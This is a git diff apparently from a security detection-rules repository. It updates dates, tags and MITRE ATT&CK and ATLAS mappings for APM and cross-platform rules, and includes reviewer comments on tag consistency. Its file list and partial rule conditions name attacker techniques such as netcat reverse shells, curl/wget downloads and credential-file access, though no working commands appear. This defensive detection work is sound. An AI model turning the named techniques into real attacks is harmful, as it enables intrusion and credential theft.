30 +---- ...n_execution_msbuild_started_by_script.toml | 45 +------ ...ion_msbuild_started_by_system_process.toml | 30 +---- ...ion_execution_msbuild_started_renamed.toml | 23 +--- ...cution_msbuild_started_unusal_process.toml | 21 +-- ...execution_suspicious_explorer_winword.toml | 25 +--- ...sion_execution_windefend_unusual_path.toml | 36 ++--- ..._evasion_file_creation_mult_extension.toml | 24 +--- ...sion_hide_encoded_executable_registry.toml | 15 +-- ...ense_evasion_iis_httplogging_disabled.toml | 10 +- ...defense_evasion_indirect_exec_conhost.toml | 11 +- .../defense_evasion_injection_msbuild.toml | 18 +-- ...efense_evasion_lolbas_win_cdb_utility.toml | 11 +- ...e_evasion_lsass_ppl_disabled_registry.toml | 9 +- ...querading_as_elastic_endpoint_process.toml | 19 ++- ..._masquerading_business_apps_installer.toml | 37 +----- ...asion_masquerading_communication_apps.toml | 19 +-- ...erading_suspicious_werfault_childproc.toml | 37 +----- ..._evasion_microsoft_defender_tampering.toml | 8 +- ...nse_evasion_modify_ownership_os_files.toml | 25 +--- ...e_evasion_ms_office_suspicious_regmod.toml | 30 ++--- ...efense_evasion_msiexec_remote_payload.toml | 35 +++-- ...etwork_connection_from_windows_binary.toml | 51 +++++-- ...persistence_account_tokenfilterpolicy.toml | 46 ++----- .../defense_evasion_posh_assembly_load.toml | 23 +--- .../defense_evasion_posh_compressed.toml | 19 +-- ...fense_evasion_posh_defender_tampering.toml | 24 +--- .../defense_evasion_posh_encryption.toml | 28 ++-- .../defense_evasion_posh_high_entropy.toml | 28 ++-- .../defense_evasion_posh_obfuscation.toml | 27 ++-- ...nse_evasion_posh_obfuscation_backtick.toml | 27 ++-- ...evasion_posh_obfuscation_backtick_var.toml | 27 ++-- ..._evasion_posh_obfuscation_char_arrays.toml | 27 ++-- ...asion_posh_obfuscation_concat_dynamic.toml | 27 ++-- ...sh_obfuscation_high_number_proportion.toml | 27 ++-- ...fuscation_iex_env_vars_reconstruction.toml | 27 ++-- ...obfuscation_iex_string_reconstruction.toml | 27 
++-- ...asion_posh_obfuscation_index_reversal.toml | 24 ++-- ...sion_posh_obfuscation_reverse_keyword.toml | 27 ++-- ...vasion_posh_obfuscation_string_concat.toml | 27 ++-- ...vasion_posh_obfuscation_string_format.toml | 27 ++-- ...scation_whitespace_special_proportion.toml | 30 +---- ...efense_evasion_posh_process_injection.toml | 25 +--- ..._powershell_windows_firewall_disabled.toml | 40 +----- ...eg_disable_enableglobalqueryblocklist.toml | 24 ++-- ...efense_evasion_regmod_remotemonologue.toml | 52 ++++---- ...efense_evasion_right_to_left_override.toml | 24 +--- rules/windows/defense_evasion_sc_sdset.toml | 24 +--- ...ion_scheduledjobs_at_protocol_enabled.toml | 46 ++----- ..._evasion_sdelete_like_filename_rename.toml | 34 +---- ...ackdoor_service_disabled_via_registry.toml | 39 +----- ..._evasion_suspicious_certutil_commands.toml | 46 ++++--- ...picious_execution_from_mounted_device.toml | 27 +++- ...n_suspicious_managedcode_host_process.toml | 59 ++++++--- ...picious_process_access_direct_syscall.toml | 25 +--- ...efense_evasion_suspicious_scrobj_load.toml | 10 +- ...defense_evasion_suspicious_wmi_script.toml | 28 +--- ...evasion_suspicious_zoom_child_process.toml | 48 ++----- ..._critical_proc_abnormal_file_activity.toml | 41 ++---- ...sion_unsigned_dll_loaded_from_suspdir.toml | 15 +-- ...fense_evasion_untrusted_driver_loaded.toml | 19 ++- ...nusual_network_connection_via_dllhost.toml | 29 ++-- ...usual_network_connection_via_rundll32.toml | 37 +++--- ...on_unusual_process_network_connection.toml | 23 +++- ...vasion_wdac_policy_by_unusual_process.toml | 8 +- .../defense_evasion_wsl_bash_exec.toml | 31 +---- .../defense_evasion_wsl_enabled_via_dism.toml | 15 +-- .../defense_evasion_wsl_kalilinux.toml | 45 ++++--- ...nse_evasion_wsl_registry_modification.toml | 10 +- ...discovery_active_directory_webservice.toml | 8 +- .../discovery_ad_explorer_execution.toml | 17 +-- .../discovery_adfind_command_activity.toml | 12 +- .../discovery_command_system_account.toml 
| 36 +---- ...enumerating_domain_trusts_via_dsquery.toml | 8 +- .../discovery_high_number_ad_properties.toml | 18 ++- ...scovery_host_public_ip_address_lookup.toml | 39 +----- .../discovery_posh_invoke_sharefinder.toml | 50 +------ ...scovery_posh_suspicious_api_functions.toml | 65 +++------ .../discovery_whoami_command_activity.toml | 8 +- ...arwinds_backdoor_child_cmd_powershell.toml | 40 +----- ...inds_backdoor_unusual_child_processes.toml | 30 ++--- .../windows/execution_com_object_xwizard.toml | 35 +++-- ...and_prompt_connecting_to_the_internet.toml | 45 +++---- ...tion_command_shell_started_by_svchost.toml | 18 ++- ...mand_shell_started_by_unusual_process.toml | 8 +- .../execution_command_shell_via_rundll32.toml | 69 ++++------ ...tion_delayed_via_ping_lolbas_unsigned.toml | 62 ++++----- .../execution_downloaded_shortcut_files.toml | 36 +---- .../execution_downloaded_url_file.toml | 34 +---- .../execution_enumeration_via_wmiprvse.toml | 61 ++++----- .../execution_from_unusual_path_cmdline.toml | 64 ++++++--- ...le_program_connecting_to_the_internet.toml | 49 +++---- ...cution_initial_access_foxmail_exploit.toml | 17 ++- ...execution_initial_access_via_msc_file.toml | 61 ++++----- ...cution_initial_access_wps_dll_exploit.toml | 33 ++--- rules/windows/execution_mofcomp.toml | 23 +--- .../execution_ms_office_written_file.toml | 38 +++--- .../execution_posh_hacktool_functions.toml | 104 +++++++++++++-- .../execution_posh_portable_executable.toml | 32 ++--- ...on_powershell_susp_args_via_winscript.toml | 12 +- ...ution_psexec_lateral_movement_command.toml | 17 +-- ...er_program_connecting_to_the_internet.toml | 23 +--- .../execution_revshell_cmd_via_netcat.toml | 28 ++-- ...tion_scheduled_task_powershell_source.toml | 43 +++--- .../execution_scripting_remote_webdav.toml | 57 +++----- .../execution_scripts_archive_file.toml | 21 ++- ...xecution_shared_modules_local_sxs_dll.toml | 34 ++--- .../windows/execution_suspicious_cmd_wmi.toml | 38 +++--- 
.../execution_suspicious_pdf_reader.toml | 46 ++----- .../execution_suspicious_psexesvc.toml | 38 +++--- .../execution_via_compiled_html_file.toml | 37 +----- .../execution_via_hidden_shell_conhost.toml | 48 +------ ...ion_via_mmc_console_file_unusual_path.toml | 42 +----- ...execution_windows_cmd_shell_susp_args.toml | 39 +++--- .../execution_windows_fakecaptcha_cmd_ps.toml | 76 ++++------- .../execution_windows_phish_clickfix.toml | 77 ++--------- ...xecution_windows_powershell_susp_args.toml | 35 +++-- ...xecution_windows_script_from_internet.toml | 74 +++++------ .../exfiltration_rclone_cloud_upload.toml | 8 +- .../exfiltration_smb_rare_destination.toml | 30 ++--- .../windows/impact_backup_file_deletion.toml | 8 +- ...deleting_backup_catalogs_with_wbadmin.toml | 8 +- ...pact_high_freq_file_renames_by_kernel.toml | 24 ++-- .../windows/impact_mod_critical_os_files.toml | 30 ++--- .../impact_ransomware_file_rename_smb.toml | 28 ++-- .../impact_ransomware_note_file_over_smb.toml | 28 ++-- ...e_shadow_copy_deletion_via_powershell.toml | 28 ++-- ..._volume_shadow_copy_deletion_via_wmic.toml | 26 ++-- ..._evasion_suspicious_htm_file_creation.toml | 36 +---- ...itial_access_execution_from_inetcache.toml | 56 +++----- ...access_execution_from_removable_media.toml | 25 ++-- ...l_access_execution_remote_via_msiexec.toml | 32 +---- ...al_access_execution_via_office_addins.toml | 44 +++---- ...cess_exfiltration_first_time_seen_usb.toml | 32 +---- ...ial_access_exploit_jetbrains_teamcity.toml | 68 ++++++---- ..._access_potential_webhelpdesk_exploit.toml | 56 +++++--- ...itial_access_rdp_file_mail_attachment.toml | 41 ++---- ...al_access_script_executing_powershell.toml | 41 +----- ...ccess_scripts_process_started_via_wmi.toml | 37 +----- ...cious_execution_from_vscode_extension.toml | 59 +++++---- ...l_access_suspicious_ms_exchange_files.toml | 38 +++--- ...access_suspicious_ms_exchange_process.toml | 34 +---- ...ious_ms_exchange_worker_child_process.toml | 60 +++++---- 
...ss_suspicious_ms_office_child_process.toml | 72 +++++----- ...s_suspicious_ms_outlook_child_process.toml | 72 +++------- ..._suspicious_windows_server_update_svc.toml | 39 +++--- .../initial_access_url_cve_2025_33053.toml | 56 +++----- ...explorer_suspicious_child_parent_args.toml | 80 +++-------- ..._access_webshell_screenconnect_server.toml | 28 ++-- ...l_access_xsl_script_execution_via_com.toml | 46 +++---- .../lateral_movement_alternate_creds_pth.toml | 30 +++-- .../windows/lateral_movement_cmd_service.toml | 55 ++++---- ...redential_access_kerberos_correlation.toml | 39 +----- rules/windows/lateral_movement_dcom_hta.toml | 24 +--- .../windows/lateral_movement_dcom_mmc20.toml | 38 +++--- ...t_dcom_shellwindow_shellbrowserwindow.toml | 35 +++-- ...n_lanman_nullsessionpipe_modification.toml | 31 ++--- ...movement_executable_tool_transfer_smb.toml | 13 +- ...nt_execution_via_file_shares_sequence.toml | 10 +- .../lateral_movement_incoming_wmi.toml | 41 +++--- ...ment_mount_hidden_or_webdav_share_net.toml | 62 +-------- ...l_movement_powershell_remoting_target.toml | 36 +---- ...lateral_movement_rdp_enabled_registry.toml | 32 ++--- ...ovement_remote_file_copy_hidden_share.toml | 16 +-- ...ement_remote_service_installed_winlog.toml | 13 +- .../lateral_movement_remote_services.toml | 33 +++-- ..._movement_remote_task_creation_winlog.toml | 43 +++--- ...ateral_movement_scheduled_task_target.toml | 39 +++--- ...movement_unusual_dns_service_children.toml | 34 +++-- ...ement_unusual_dns_service_file_writes.toml | 30 ++--- ...l_movement_via_startup_folder_rdp_smb.toml | 31 +++-- .../lateral_movement_via_wsus_update.toml | 37 +++--- .../windows/persistence_ad_adminsdholder.toml | 35 ++--- .../persistence_adobe_hijack_persistence.toml | 15 +-- .../windows/persistence_app_compat_shim.toml | 37 +++--- .../persistence_appcertdlls_registry.toml | 39 +----- .../persistence_appinitdlls_registry.toml | 34 +---- ...persistence_browser_extension_install.toml | 8 +- 
...evasion_hidden_local_account_creation.toml | 39 +++--- ...tence_evasion_registry_ifeo_injection.toml | 40 +++--- ...egistry_startup_shell_folder_modified.toml | 32 ++--- ...sistence_group_modification_by_system.toml | 25 ++-- ...istence_local_scheduled_task_creation.toml | 33 +++-- ...stence_local_scheduled_task_scripting.toml | 41 +----- ...istence_msds_alloweddelegateto_krbtgt.toml | 31 ++--- ...ersistence_msi_installer_task_startup.toml | 47 ++++--- ...persistence_msoffice_startup_registry.toml | 34 +---- .../windows/persistence_netsh_helper_dll.toml | 19 +-- ...ll_exch_mailbox_activesync_add_device.toml | 43 +----- .../persistence_powershell_profiles.toml | 39 +----- ...escalation_via_accessibility_features.toml | 24 +--- .../persistence_registry_uncommon.toml | 40 ++++-- .../persistence_remote_password_reset.toml | 30 ++--- ...ce_runtime_run_key_startup_susp_procs.toml | 10 +- ...istence_sdprop_exclusion_dsheuristics.toml | 51 +++---- .../persistence_service_dll_unsigned.toml | 56 +++----- ...stence_service_windows_service_winlog.toml | 33 +++-- .../persistence_services_registry.toml | 32 ++--- ...lder_file_written_by_unsigned_process.toml | 34 +---- .../persistence_startup_folder_scripts.toml | 12 +- ...stence_suspicious_com_hijack_registry.toml | 35 +---- ...s_image_load_scheduled_task_ms_office.toml | 36 +---- ...nce_suspicious_scheduled_task_runtime.toml | 24 ++-- ...e_suspicious_service_created_registry.toml | 40 +++--- ...uspicious_user_mandatory_profile_file.toml | 18 +-- ...istence_sysmon_wmi_event_subscription.toml | 33 +++-- ...ersistence_system_shells_via_services.toml | 60 ++++----- .../persistence_temp_scheduled_task.toml | 32 +---- .../persistence_time_provider_mod.toml | 39 +----- ..._account_added_to_privileged_group_ad.toml | 35 +++-- .../persistence_user_account_creation.toml | 13 +- .../persistence_via_application_shimming.toml | 27 +--- ...rsistence_via_bits_job_notify_command.toml | 29 ++-- ...sistence_via_hidden_run_key_valuename.toml 
| 60 +++------ ...sa_security_support_provider_registry.toml | 34 +---- ...emetrycontroller_scheduledtask_hijack.toml | 22 +--- ...ia_update_orchestrator_service_hijack.toml | 30 ++++- ...nt_instrumentation_event_subscription.toml | 35 +---- ...tence_via_wmi_stdregprov_run_services.toml | 49 ++++--- ...ia_xp_cmdshell_mssql_stored_procedure.toml | 53 +++----- .../persistence_webshell_detection.toml | 66 +++------- .../persistence_werfault_reflectdebugger.toml | 20 +-- ...on_account_takeover_mixed_logon_types.toml | 19 +-- ...ge_escalation_badsuccessor_dmsa_abuse.toml | 33 ++--- ...tion_create_process_as_different_user.toml | 33 +++-- ...tion_create_process_with_token_unpriv.toml | 33 +++-- ...privilege_escalation_credroaming_ldap.toml | 33 ++--- ...ilege_escalation_disable_uac_registry.toml | 56 +++----- ...alation_dmsa_creation_by_unusual_user.toml | 39 ++---- ...e_escalation_dns_serverlevelplugindll.toml | 27 ++-- ...ege_escalation_driver_newterm_imphash.toml | 32 +---- ...lege_escalation_expired_driver_loaded.toml | 33 ++--- ...lege_escalation_exploit_cve_202238028.toml | 32 +---- ...calation_gpo_schtask_service_creation.toml | 44 ++++--- ...ege_escalation_group_policy_iniscript.toml | 41 +++--- ...scalation_group_policy_scheduled_task.toml | 39 ++---- ...rivilege_escalation_installertakeover.toml | 14 +- ...scalation_krbrelayup_service_creation.toml | 44 +++---- ...privilege_escalation_lsa_auth_package.toml | 35 ++--- ...privilege_escalation_make_token_local.toml | 35 +++-- ...escalation_msi_repair_via_mshelp_link.toml | 22 +--- ...e_escalation_named_pipe_impersonation.toml | 8 +- ...scalation_newcreds_logon_rare_process.toml | 36 +++-- ...ge_escalation_persistence_phantom_dll.toml | 51 ++----- ...on_port_monitor_print_processor_abuse.toml | 34 ++--- ...e_escalation_posh_token_impersonation.toml | 56 ++++---- ...printspooler_suspicious_file_deletion.toml | 34 ++--- ..._escalation_reg_service_imagepath_mod.toml | 59 ++++----- 
...calation_rogue_windir_environment_var.toml | 10 +- ...lation_samaccountname_spoofing_attack.toml | 44 +------ ...on_service_control_spawned_script_int.toml | 100 +++++--------- ...alation_suspicious_dnshostname_update.toml | 19 +-- ...ege_escalation_takeover_new_source_ip.toml | 31 +++-- ...escalation_thread_cpu_priority_hijack.toml | 15 +-- ...lation_tokenmanip_sedebugpriv_enabled.toml | 25 ++-- ...lege_escalation_uac_bypass_com_clipup.toml | 43 +++--- ...ge_escalation_uac_bypass_com_ieinstal.toml | 56 ++------ ...n_uac_bypass_com_interface_icmluautil.toml | 55 ++------ ...alation_uac_bypass_diskcleanup_hijack.toml | 58 ++------ ...escalation_uac_bypass_dll_sideloading.toml | 40 +++--- ...ge_escalation_uac_bypass_event_viewer.toml | 24 ++-- ...ege_escalation_uac_bypass_mock_windir.toml | 40 +++--- ...scalation_uac_bypass_winfw_mmc_hijack.toml | 40 +++--- ...tion_unusual_parentchild_relationship.toml | 40 ++---- ...n_unusual_svchost_childproc_childless.toml | 30 ++--- ...rivilege_escalation_via_ppid_spoofing.toml | 10 +- ...ilege_escalation_via_rogue_named_pipe.toml | 8 +- .../privilege_escalation_via_token_theft.toml | 30 +++-- ...on_windows_service_via_unusual_client.toml | 30 +++-- 1187 files changed, 13123 insertions(+), 22321 deletions(-)
diff --git a/rules/apm/apm_403_response_to_a_post.toml b/rules/apm/apm_403_response_to_a_post.toml
index ef503e3741b..05b6e24dba3 100644
--- a/rules/apm/apm_403_response_to_a_post.toml
+++ b/rules/apm/apm_403_response_to_a_post.toml
@@ -2,7 +2,7 @@
creation_date = "2020/02/18"
integration = ["apm"]
maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -25,7 +25,7 @@ references = ["https://en.wikipedia.org/wiki/HTTP_403"]
risk_score = 47
rule_id = "a87a4e42-1d82-44bd-b0bf-d9b7f91fb89e"
severity = "medium"
-tags = ["Data Source: APM", "Resources: Investigation Guide"]
+tags = ["Tactic: Initial Access", "Data Source: APM", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "query"
@@ -67,3 +67,15 @@ Web applications often use POST requests to handle data submissions securely. Ho
- Review and update the web application firewall (WAF) rules to better detect and block unauthorized POST requests, ensuring that legitimate traffic is not affected.
- If applicable, engage with the development team to conduct a security review of the application code to identify and fix any potential vulnerabilities that could be exploited by attackers."""
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/apm/apm_405_response_method_not_allowed.toml b/rules/apm/apm_405_response_method_not_allowed.toml
index 1116968ca65..b46b5811271 100644
--- a/rules/apm/apm_405_response_method_not_allowed.toml
+++ b/rules/apm/apm_405_response_method_not_allowed.toml
@@ -2,7 +2,7 @@
creation_date = "2020/02/18"
integration = ["apm"]
maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -25,7 +25,7 @@ references = ["https://en.wikipedia.org/wiki/HTTP_405"]
risk_score = 47
rule_id = "75ee75d8-c180-481c-ba88-ee50129a6aef"
severity = "medium"
-tags = ["Data Source: APM", "Resources: Investigation Guide"]
+tags = ["Tactic: Reconnaissance", "Data Source: APM", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "query"
@@ -67,3 +67,15 @@ Web applications often restrict HTTP methods to protect resources, allowing only
- Conduct a vulnerability assessment of the web application to identify and remediate any potential security weaknesses that could be exploited by unauthorized HTTP methods.
- Document the incident, including the response actions taken, and update the incident response plan to improve future detection and response capabilities for similar threats."""
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1595"
+name = "Active Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/"
+
+[rule.threat.tactic]
+id = "TA0043"
+name = "Reconnaissance"
+reference = "https://attack.mitre.org/tactics/TA0043/"
diff --git a/rules/apm/apm_sqlmap_user_agent.toml b/rules/apm/apm_sqlmap_user_agent.toml
index 82c01caadac..264a4d2fa50 100644
--- a/rules/apm/apm_sqlmap_user_agent.toml
+++ b/rules/apm/apm_sqlmap_user_agent.toml
@@ -2,7 +2,7 @@
creation_date = "2020/02/18"
integration = ["apm"]
maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -25,7 +25,7 @@ references = ["http://sqlmap.org/"]
risk_score = 47
rule_id = "d49cc73f-7a16-4def-89ce-9fc7127d7820"
severity = "medium"
-tags = ["Data Source: APM", "Resources: Investigation Guide"]
+tags = ["Tactic: Reconnaissance", "Data Source: APM", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "query"
@@ -68,3 +68,20 @@ Sqlmap is a widely-used open-source tool designed to automate the detection and
- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation.
- Document the incident details and response actions taken for future reference and to enhance incident response procedures."""
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1595"
+name = "Active Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1595.002"
+name = "Vulnerability Scanning"
+reference = "https://attack.mitre.org/techniques/T1595/002/"
+
+[rule.threat.tactic]
+id = "TA0043"
+name = "Reconnaissance"
+reference = "https://attack.mitre.org/tactics/TA0043/"
diff --git a/rules/cross-platform/command_and_control_common_llm_endpoint.toml b/rules/cross-platform/command_and_control_common_llm_endpoint.toml
index 8614a7cea40..61c7d4276cc 100644
--- a/rules/cross-platform/command_and_control_common_llm_endpoint.toml
+++ b/rules/cross-platform/command_and_control_common_llm_endpoint.toml
@@ -2,7 +2,7 @@
creation_date = "2025/09/01"
integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2026/02/10"
+updated_date = "2026/03/23"
[rule]
@@ -55,18 +55,7 @@ references = ["https://malpedia.caad.fkie.fraunhofer.de/details/py.lamehug"]
risk_score = 47
rule_id = "4ae94fc1-f08f-419f-b692-053d28219380"
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "OS: macOS",
- "Use Case: Threat Detection",
- "Tactic: Command and Control",
- "Resources: Investigation Guide",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: SentinelOne",
- "Data Source: Sysmon",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: AI Model Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Sysmon"]
timestamp_override = "event.ingested"
type = "eql"
@@ -150,16 +139,21 @@ network where host.os.type in ("macos", "windows") and dns.question.name != null
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1102"
name = "Web Service"
reference = "https://attack.mitre.org/techniques/T1102/"
-
-
[rule.threat.tactic]
id = "TA0011"
name = "Command and Control"
reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat]]
+framework = "MITRE ATLAS"
+[rule.threat.tactic]
+id = "AML.TA0000"
+name = "AI Model Access"
+reference = "https://atlas.mitre.org/tactics/AML.TA0000/"
diff --git a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml
index 5ba4932123d..6ae2b55dc7b 100644
--- a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml
+++ b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml
@@ -2,7 +2,7 @@
creation_date = "2025/09/18"
integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -123,17 +123,12 @@ process.parent.name in ("node", "bun", "node.exe", "bun.exe") and (
[[rule.threat]]
framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Command and Control"
- id = "TA0011"
- reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
- [[rule.threat.technique]]
- name = "Application Layer Protocol"
- id = "T1071"
- reference = "https://attack.mitre.org/techniques/T1071/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Web Protocols"
- id = "T1071.001"
- reference = "https://attack.mitre.org/techniques/T1071/001/"
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml b/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml
index 714d192afa5..6e96067d174 100644
--- a/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml
+++ b/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml
@@ -2,7 +2,7 @@
creation_date = "2025/12/04"
integration = ["endpoint", "windows"]
maturity = "production"
-updated_date = "2025/12/04"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -116,19 +116,13 @@ network where host.os.type in ("macos", "windows") and
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1071"
name = "Application Layer Protocol"
reference = "https://attack.mitre.org/techniques/T1071/"
-[[rule.threat.technique.subtechnique]]
-id = "T1071.004"
-name = "DNS"
-reference = "https://attack.mitre.org/techniques/T1071/004/"
-
-
[rule.threat.tactic]
id = "TA0011"
name = "Command and Control"
reference = "https://attack.mitre.org/tactics/TA0011/"
-
diff --git a/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml b/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml
index 47c2fb74836..ffaa3660825 100644
--- a/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml
+++ b/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml
@@ -2,7 +2,7 @@
creation_date = "2025/12/04"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/03/10"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -113,22 +113,34 @@ event.category:network and host.os.type:macos and event.action:connection_attemp
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1071"
name = "Application Layer Protocol"
reference = "https://attack.mitre.org/techniques/T1071/"
+
[[rule.threat.technique.subtechnique]]
id = "T1071.001"
name = "Web Protocols"
reference = "https://attack.mitre.org/techniques/T1071/001/"
-
-
[rule.threat.tactic]
id = "TA0011"
name = "Command and Control"
reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat]]
+framework = "MITRE ATLAS"
+
+[[rule.threat.technique]]
+id = "AML.T0072"
+name = "Reverse Shell"
+reference = "https://atlas.mitre.org/techniques/AML.T0072/"
+
+[rule.threat.tactic]
+id = "AML.TA0014"
+name = "Command and Control"
+reference = "https://atlas.mitre.org/tactics/AML.TA0014/"
[rule.new_terms]
field = "new_terms_fields"
value = ["destination.domain"]
diff --git a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml
index 0ca53756373..843b580ae3b 100644
--- a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml
+++ b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml
@@ -2,7 +2,7 @@
creation_date = "2025/12/10"
integration = ["endpoint", "suricata"]
maturity = "production"
-updated_date = "2026/01/20"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -73,10 +73,3 @@ note = """## Triage and analysis
- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.
"""
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/cross-platform/command_and_control_tunnel_qemu.toml b/rules/cross-platform/command_and_control_tunnel_qemu.toml
index 6a3c887e279..20b9041be9c 100644
--- a/rules/cross-platform/command_and_control_tunnel_qemu.toml
+++ b/rules/cross-platform/command_and_control_tunnel_qemu.toml
@@ -2,7 +2,7 @@
creation_date = "2026/02/09"
integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"]
maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -95,14 +95,13 @@ process where event.type == "start" and
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1219"
-name = "Remote Access Tools"
-reference = "https://attack.mitre.org/techniques/T1219/"
+[[rule.threat.technique]]
+id = "T1572"
+name = "Protocol Tunneling"
+reference = "https://attack.mitre.org/techniques/T1572/"
[rule.threat.tactic]
id = "TA0011"
name = "Command and Control"
reference = "https://attack.mitre.org/tactics/TA0011/"
-
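Review bot: Removing the whole `[[rule.threat]]` block leaves command_and_control_suricata_elastic_defend_c2.toml with no ATT&CK tactic at all, and the file's `tags` line is not touched by this patch. If that line still carries `Tactic: Command and Control`, the orphan check added to tests/test_all_rules.py in this same series (`_mitre_tactic_tag_gaps`) will report it, since "Command and Control" is an ATT&CK tactic name with no matching threat entry. Either drop that tag in the same commit or keep a tactic-only entry (`framework = "MITRE ATT&CK"` plus the `TA0011` tactic table, as the removed lines had) so the rule name, tags and mapping agree.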
diff --git a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml
index 70427bd61ba..cce002926ea 100644
--- a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml
+++ b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml
@@ -2,7 +2,7 @@
creation_date = "2025/12/04"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/03/10"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -57,21 +57,7 @@ references = [
risk_score = 73
rule_id = "c0136397-f82a-45e5-9b9f-a3651d77e21a"
severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "OS: macOS",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Collection",
- "Tactic: Credential Access",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
- "Domain: LLM",
- "Mitre Atlas: T0085",
- "Mitre Atlas: T0085.001",
- "Mitre Atlas: T0055",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0085", "Mitre Atlas: T0085.001", "Mitre Atlas: T0055"]
timestamp_override = "event.ingested"
type = "eql"
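Review bot: The rebuilt `tags` line keeps ATLAS coverage as free-form `Mitre Atlas: T0085`, `Mitre Atlas: T0085.001` and `Mitre Atlas: T0055` strings, while command_and_control_common_llm_endpoint.toml and command_and_control_genai_process_unusual_domain.toml in the same patch model ATLAS as a `[[rule.threat]]` entry with `framework = "MITRE ATLAS"`. Two encodings of one framework means the new tag/threat consistency test only sees the second form (it walks `rule.threat`), so these tag-only references are never validated against anything. Pick one representation for the series; the same tag-only ATLAS references survive in the defense_evasion_genai_process_compiling_executables.toml (`Mitre Atlas: T0053`) and defense_evasion_genai_process_encoding_prior_to_network_activity.toml (`Mitre Atlas: T0086`) tag hunks.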
@@ -139,26 +125,51 @@ file where event.action in ("open", "creation", "modification") and event.outcom
[[rule.threat]]
framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
